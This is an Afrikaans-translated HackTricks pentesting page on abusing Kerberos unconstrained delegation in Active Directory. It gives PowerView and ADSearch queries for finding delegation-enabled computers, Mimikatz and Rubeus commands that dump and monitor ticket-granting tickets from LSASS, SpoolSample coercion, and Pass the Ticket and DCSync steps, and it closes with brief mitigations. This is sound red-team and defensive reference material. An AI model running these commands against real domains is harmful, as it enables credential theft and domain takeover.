Unconstrained Delegation

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Unconstrained delegation

Dit is ā€™n kenmerk wat ā€™n Domein Administrateur kan stel op enige Rekenaar binne die domein. Dan, wanneer ā€™n gebruiker aanmeld op die Rekenaar, sal ā€™n kopie van die TGT van daardie gebruiker binne die TGS wat deur die DC gestuur word en in geheue in LSASS gestoor word. So, as jy Administrateur regte op die masjien het, sal jy in staat wees om die kaartjies te dump en die gebruikers na te doen op enige masjien.

So as ā€™n domein admin aanmeld op ā€™n Rekenaar met die ā€œUnconstrained Delegationā€ kenmerk geaktiveer, en jy het plaaslike admin regte op daardie masjien, sal jy in staat wees om die kaartjie te dump en die Domein Admin enige plek na te doen (domein privesc).

Jy kan Rekenaar objekte met hierdie attribuut vind deur te kyk of die userAccountControl attribuut ADS_UF_TRUSTED_FOR_DELEGATION bevat. Jy kan dit doen met ā€™n LDAP filter van ā€˜(userAccountControl:1.2.840.113556.1.4.803:=524288)ā€™, wat is wat powerview doen:

# List unconstrained computers
## Powerview
## A DCs always appear and might be useful to attack a DC from another compromised DC from a different domain (coercing the other DC to authenticate to it)
Get-DomainComputer ā€“Unconstrained ā€“Properties name
Get-DomainUser -LdapFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'

## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem

# Export tickets with Mimikatz
## Access LSASS memory
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
## Doens't access LSASS memory directly, but uses Windows APIs
Rubeus.exe dump
Rubeus.exe monitor /interval:10 [/filteruser:<username>] #Check every 10s for new TGTs

Laai die kaartjie van die Administrateur (of slagoffer gebruiker) in geheue met Mimikatz of Rubeus vir ā€™n Pass the Ticket.
Meer inligting: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Meer inligting oor Onbeperkte delegasie in ired.team.

Forceer Verifikasie

As ā€™n aanvaller in staat is om ā€™n rekenaar wat toegelaat word vir ā€œOnbeperkte Delegasieā€ te kompromitteer, kan hy ā€™n Print bediener mislei om outomaties aan te meld teen dit terwyl ā€™n TGT in die geheue van die bediener gestoor word.
Dan kan die aanvaller ā€™n Pass the Ticket aanval uitvoer om die gebruiker se Print bediener rekenaarrekening na te doen.

Om ā€™n print bediener teen enige masjien aan te meld, kan jy SpoolSample:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

As die TGT van ā€™n domeinbeheerder is, kan jy ā€™n DCSync-aanval uitvoer en al die hashes van die DC verkry.
Meer inligting oor hierdie aanval in ired.team.

Vind hier ander maniere om ā€™n outentisering te dwing:

Force NTLM Privileged Authentication

Versagting

  • Beperk DA/Admin aanmeldings tot spesifieke dienste
  • Stel ā€œRekening is sensitief en kan nie gedelegeer word nieā€ vir bevoorregte rekeninge.

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks